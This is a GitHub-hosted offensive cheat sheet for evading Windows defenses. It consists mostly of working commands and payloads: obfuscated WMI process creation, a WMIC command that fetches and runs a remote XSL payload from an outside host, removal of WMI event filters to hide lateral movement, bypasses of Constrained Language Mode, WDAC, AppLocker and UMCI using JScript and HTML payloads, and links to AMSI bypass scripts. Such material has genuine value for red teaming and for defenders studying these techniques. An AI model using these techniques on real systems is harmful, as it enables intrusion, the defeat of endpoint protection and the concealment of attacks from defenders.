-
Notifications
You must be signed in to change notification settings - Fork 152
/
Copy pathDefenses-Evasion-Cheat-Sheet
260 lines (201 loc) · 11 KB
/
Defenses-Evasion-Cheat-Sheet
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
***********************************************************************************************
Useful Resources
***********************************************************************************************
Awesome tool for restricted env. evasion:
https://github.com/Cn33liz/p0wnedLoader
https://rastamouse.me/2018/05/csharp-dotnettojscript-xsl/
https://github.com/Arno0x/PowerShellScripts
https://github.com/cobbr/PSAmsi/wiki/Introduction-To-PSAmsi
https://github.com/secabstraction/WmiSploit
More:
https://bohops.com/2019/01/10/com-xsl-transformation-bypassing-microsoft-application-control-solutions-cve-2018-8492/
https://tyranidslair.blogspot.com/2018/06/disabling-amsi-in-jscript-with-one.html
https://oddvar.moe/
https://www.fortynorthsecurity.com/building-a-windows-defender-application-control-lab/
https://posts.specterops.io/threat-detection-using-windows-defender-application-control-device-guard-in-audit-mode-602b48cd1c11
https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/evaluate-windows-defender-exploit-guard
http://www.exploit-monday.com/2018/06/device-guard-and-application.html
https://lolbas-project.github.io/#
https://www.contextis.com/en/blog/amsi-bypass
***********************************************************************************************
Evade Detection and/or Restricted Environments
***********************************************************************************************
WMI Class Derivation (Evasion) with no "win32" prefix:
$C = [WmiClass] '/root/cimv2:Win32_Process'
$N = $C.derive('MyEvilProcess')
$N.Put()
Invoke-WmiMethod MyEvilProcess -Name CrEaTe -ArgumentList calc.exe
Advanced WMI Class Derivation - presented at Security BsidesDublin 2019 talk.
[+] Full details https://github.com/kmkz/PowerShell/tree/master/BsidesDublin-2019
# RandomName function:
function GenerateRandomName(){
$Pf = "abcdefghijkmnopqrstuvwxyzABCEFGHJKLMNPQRSTUVWXYZ23456789".TOchArarRay()
$rSVdssS1=""
1..10 | ForEach { $rSVdssS1 += $Pf | Get-Random }
return $rSVdssS1
}
# Class derivation
zNrF = -jOin[regex]::MaTcHeS('sSeCorp_23nIw:2VmIc/tOoR/',".",'RightToLeft')
$CoFtfEgvsJ = [wMicLaSs]$zNrF
$YepTa = "pRoc"+"eSs"
$PoDtbeF4Dp= GenerateRandomName
$N = $CoFtfEgvsJ.dEriVe("$PoDtbeF4Dp")
$N.pUt()
$BlzQ=0
$VrBnZ=111-1+3+7+5+5-3+$BlzQ
$CpOnBt5= gEt-cOntEnt -paTh "\\Vboxsvr\shared\BSIDESIE\cmd.in.txt" # your command
# Payload execution:
iNvokE-wmIMeThOd $PoDtbeF4Dp -NaMe CrEaTe -arGumEntlIst "cMd ^/c $CpOnBt5 >>\\Vboxsvr\shared\BSIDESIE\$rSVdssS.lol" # collect output (if needed)
Authenticated proxy bypass:
"Creates a TCP Tunnel through the default system proxy. As such, it automatically handles proxy authentication if ever required."
https://github.com/Arno0x/PowerShellScripts/blob/master/proxyTunnel.ps1
PowerShell without PowerShell + restricted env. escaping through WMIC XSL payload execution:
C:\Windows\System32\WMIC.exe os get /format:"https://tatamaster.lol/p0wnedLoader/p0wnedLoader.xsl"
Blue team/detection mechanisms evasion for WMI lateral movements:
(Add following line to your payload to remove Windows "Applications" EvenViewer logs)
Get-WmiObject __eventFilter -namespace root/subscription -filter "name='_PersistenceEvent_'"| Remove-WmiObject
Get-WmiObject __eventFilter -namespace root/subscription -filter "name='_ProcessCreationEvent_'"| Remove-WmiObject
***********************************************************************************************
Windows Defenses Bypass
***********************************************************************************************
#####################################################
/ Testing environment /
/ Windows 10 Version:1803, O.S build 17134.523 /
#####################################################
-----------------------------------------------------
Constrained Language Mode (CLM)
-----------------------------------------------------
Identification:
In PowerShell: $ExecutionContext.SessionState.LanguageMode
Active: ConstrainedLanguage
Inactive: FullLanguage
Bypass:
1) $ExecutionContext.SessionState.LanguageMode = "FullLanguage"
2) PowerShell downgrade attack (require psh v2) : "PowerShell -Version 2 -Command <...>"
PowerShell V2 advantages are:
- It do not implement AMSI;
- No PowerShell logging;
However, it is not present on both Windows 10 and Windows Server 2016.
3) wmic.exe process call create powershell.exe (usable remotely)
Resources:
P0wnedShell by Cn33liz: https://github.com/Cn33liz/p0wnedShell
----------------------------------------------------------------------
Windows Defender Application Control (WDAC)
----------------------------------------------------------------------
Identification:
Configuration file location: %systemroot%\schemas\CodeIntegrity\ExamplePolicies\*.xml
Default configuration file: %systemroot%\schemas\CodeIntegrity\ExamplePolicies\DefaultWindows_Enforced.xml
Bypass:
- CVE-2018-8492 (WDAC Bypass via COM XSLT):
1) Find available COM object:
$ErrorActionPreference = "SilentlyContinue"
$ids = gwmi Win32_COMSetting | ?{ $_.ProgId -ne $null }
$ids | ForEach {if (new-object -com $_.ProgID){$_.ProgID}}
- WDAC using default policy:
2) Store payload in XML file:
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
]]> </ms:script>
</stylesheet>
3) Execute following PowerShell code:
$xsl = new-object -ComObject Microsoft.XMLDOM.1.0
$xsl.load("c:\path\to\minimalist.xml")
$xsl.transformNode($xsl)
Resources:
CVE-2018-8492: https://bohops.com/2019/01/10/com-xsl-transformation-bypassing-microsoft-application-control-solutions-cve-2018-8492/
COM security: https://docs.microsoft.com/en-us/windows/desktop/com/security-in-com
-----------------------------------------------------
Antimalware Scan Interface (AMSI)
-----------------------------------------------------
Identification (for ScanBuffer):
In a PowerShell terminal, enter “AmsiScanBuffer” (with double quotes)
Bypasses:
https://github.com/kmkz/PowerShell/blob/master/amsi-bypass.ps1
Resources:
https://www.contextis.com/en/blog/amsi-bypass
https://rastamouse.me/2018/12/amsiscanbuffer-bypass-part-4/ (most recent techniques)
https://tyranidslair.blogspot.com/2018/06/disabling-amsi-in-jscript-with-one.html
----------------------------------------
AppLocker demystification
----------------------------------------
"When whitelisting policies are enforced, PowerShell CLM is applied in AppLocker (for users in "Allowed Mode") and WDAC (for users and administrators)."
Error message: "This app has been blocked by your system Administrator"
Bypass:
1) use p0wnedShell via .xsl file + encryption (for Defender Bypass) https://github.com/Cn33liz/p0wnedLoader for payload delivery (WMI)
Example: C:\Windows\System32\wbem\WMIC.exe os get /format:"https://tatamaster/p0wnedLoader.xsl"
2) https://github.com/kmkz/PowerShell/blob/master/Semi-interactive-shell-applocker-bypass.ps1
Resources:
P0wnedShell by Cn33liz: https://github.com/Cn33liz/p0wnedShell
AAronLocker: https://blogs.msdn.microsoft.com/aaron_margosis/2018/06/26/announcing-application-whitelisting-with-aaronlocker/
https://www.slideshare.net/OddvarHlandMoe/appolockalypse-now
https://github.com/api0cradle/UltimateAppLockerByPassList
---------------------------------------------------------------------------------------------------------------------------------------------------
Windows Lockdown Policy (WLDP aka Device Guard) with User Mode Code Integrity (UMCI) policy
---------------------------------------------------------------------------------------------------------------------------------------------------
Definition:
When "enforced" by AppLocker policy, CLM COM object instantiation is very open.
In essence, (m)any COM object can be instantiated by default when WLDP is not active.
Under WDAC with UMCI, the WLDP greatly reduces this number (between 8 to 50 COM objects according to James Forshaw of Google Project Zero in this .NET COM Instantiation UMCI bypass disclosure write-up linked in "Resources" part).
Bypass based on CVE-2018-1039 by Google Project Zero:
1) Create a "keys.txt" file with following content:
HKEY_CURRENT_USER\Software\Classes\CLSID\{70B46225-C474-4852-BB81-48E0D36F9A5A}
= REG_SZ WScript.Shell
HKEY_CURRENT_USER\Software\Classes\CLSID\{70B46225-C474-4852-BB81-48E0D36F9A5A}\TreatAs
= REG_SZ {72C24DD5-D70A-438B-8A42-98424B88AFB8}
HKEY_CURRENT_USER\Software\Classes\CLSID\{70B46225-C474-4852-BB81-48E0D36F9A5A}\Implemented Categories\{7DD95801-9882-11CF-9FA9-00AA006C42C4}
HKEY_CURRENT_USER\Software\Classes\CLSID\{70B46225-C474-4852-BB81-48E0D36F9A5A}\Implemented Categories\{7DD95802-9882-11CF-9FA9-00AA006C42C4}
2) From the explorer Run dialog execute “regini path\to\keys.txt”
3) Create a "shell.html" file with following content (our payload):
<html>
<body>
<object id="obj" classid="clsid:70B46225-C474-4852-BB81-48E0D36F9A5A">NO OBJECT</object>
<script>
try {
obj.Exec("notepad");
} catch (e) {
alert(e.message);
}
</script>
</body>
</html>
4) Execute the HTML file from the Run dialog using "hh.exe path\to\shell.html"
Resources:
https://bugs.chromium.org/p/project-zero/issues/detail?id=1514 (fixed on 5/08/2018)
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-1039
-----------------------------------------------------------------------------------
Application Identify Service (Process name: AppIDSvc)
-----------------------------------------------------------------------------------
Definition:
The Application Identity service determines and verifies the identity of an app.
Stopping this service will prevent AppLocker policies from being enforced.
Important:
When using Group Policy, you must configure it to start automatically in at least one Group Policy Object (GPO) that applies AppLocker rules.
This is because AppLocker uses this service to verify the attributes of a file.
Identification:
Get-Service appidsvc
Bypass through COM object technique:
1) Store payload in XML file:
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
]]> </ms:script>
</stylesheet>
2) Use "COM" object to execute payload:
$xsl = new-object -ComObject Msxml2.DoMDocument.6.0
$xsl.load("C:\Users\Victim\Documents\minimalist.xml") | out-null
$xsl.setProperty("AllowXsltScript",$true)
$xsl.transformNode($xsl)